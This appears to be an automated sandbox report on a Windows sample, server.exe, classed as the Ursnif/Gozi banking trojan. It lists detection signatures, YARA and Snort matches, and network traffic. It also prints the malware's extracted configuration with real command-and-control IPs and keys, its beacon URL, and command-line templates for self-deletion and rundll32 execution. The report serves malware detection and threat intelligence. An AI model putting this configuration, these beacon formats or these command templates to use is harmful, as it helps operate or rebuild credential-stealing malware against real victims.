Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
server.exe

Overview

General Information

Sample Name:server.exe
Analysis ID:826308
MD5:8f092511c91bfc1f2516e420739a7967
SHA1:dc67d8f55a6591d16c2709ea65ad143e3a216ec0
SHA256:9261b47b4fd67523f7afe640e55ccb95ec8b154b5dfa34a8564986ac3e97fe1a
Tags:agenziaentrateexegoziisfbmefmiseursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Snort IDS alert for network traffic
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware

Classification

  • System is w10x64
  • server.exe (PID: 5540 cmdline: C:\Users\user\Desktop\server.exe MD5: 8F092511C91BFC1F2516E420739A7967)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1ce8:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0x1228:$a1: /C ping localhost -n %u && del "%s"
      • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xa9c:$a5: filename="%.4u.%lu"
      • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe6d:$a9: &whoami=%s
      • 0xe56:$a10: %u.%u_%u_%u_x%u
      • 0xd63:$a11: size=%u&hash=0x%08x
      • 0xb1d:$a12: &uptime=%u
      • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
      • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 27 entries
      No Sigma rule has matched
      Timestamp:192.168.2.562.173.142.5149680802033203 03/14/23-16:02:33.550566
      SID:2033203
      Source Port:49680
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: server.exeReversingLabs: Detection: 32%
      Source: server.exeVirustotal: Detection: 43%Perma Link
      Source: http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2Avira URL Cloud: Label: malware
      Source: http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2BWc8v/UHxdAMkcyeaROQd9/EwiLplzlm9gCiDQ/KqEVG_2BN1u2apPrXD/iYwyB9P6y/3dh1O1SBALUj6nSMRJfH/HHlM5d4xQO9d95rkA_2/Bt59zcQMsfJpOgJC8GeSrH/5REGnF8guLwya/xQ1cfd2Y/w3tCRH4bjXIzu_2B_2F_2B5/MmfV_2FK_2/B5ux_2BgxJ6omqMfT/iSBh1mrWB9_2/BRaJgBOq4gEVdF7OIVd_2B/4.jlkAvira URL Cloud: Label: malware
      Source: http://62.173.142.51/Avira URL Cloud: Label: malware
      Source: server.exeJoe Sandbox ML: detected
      Source: 0.2.server.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 00000000.00000002.580738483.0000000002689000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

      Compliance

      barindex
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Networking

      barindex
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49680 -> 62.173.142.51:80
      Source: global trafficHTTP traffic detected: GET /drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2BWc8v/UHxdAMkcyeaROQd9/EwiLplzlm9gCiDQ/KqEVG_2BN1u2apPrXD/iYwyB9P6y/3dh1O1SBALUj6nSMRJfH/HHlM5d4xQO9d95rkA_2/Bt59zcQMsfJpOgJC8GeSrH/5REGnF8guLwya/xQ1cfd2Y/w3tCRH4bjXIzu_2B_2F_2B5/MmfV_2FK_2/B5ux_2BgxJ6omqMfT/iSBh1mrWB9_2/BRaJgBOq4gEVdF7OIVd_2B/4.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache
      Source: Joe Sandbox ViewASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
      Source: unknownDNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
      Source: Joe Sandbox ViewIP Address: 62.173.142.51 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: server.exe, 00000000.00000002.580755093.000000000281C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://62.173
      Source: server.exe, 00000000.00000002.580573765.0000000000706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.173.142.51/
      Source: server.exe, 00000000.00000002.580573765.0000000000706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2
      Source: unknownDNS traffic detected: queries for: checklist.skype.com
      Source: global trafficHTTP traffic detected: GET /drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2BWc8v/UHxdAMkcyeaROQd9/EwiLplzlm9gCiDQ/KqEVG_2BN1u2apPrXD/iYwyB9P6y/3dh1O1SBALUj6nSMRJfH/HHlM5d4xQO9d95rkA_2/Bt59zcQMsfJpOgJC8GeSrH/5REGnF8guLwya/xQ1cfd2Y/w3tCRH4bjXIzu_2B_2F_2B5/MmfV_2FK_2/B5ux_2BgxJ6omqMfT/iSBh1mrWB9_2/BRaJgBOq4gEVdF7OIVd_2B/4.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTR

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTR

      System Summary

      barindex
      Source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.580553464.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.580553464.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
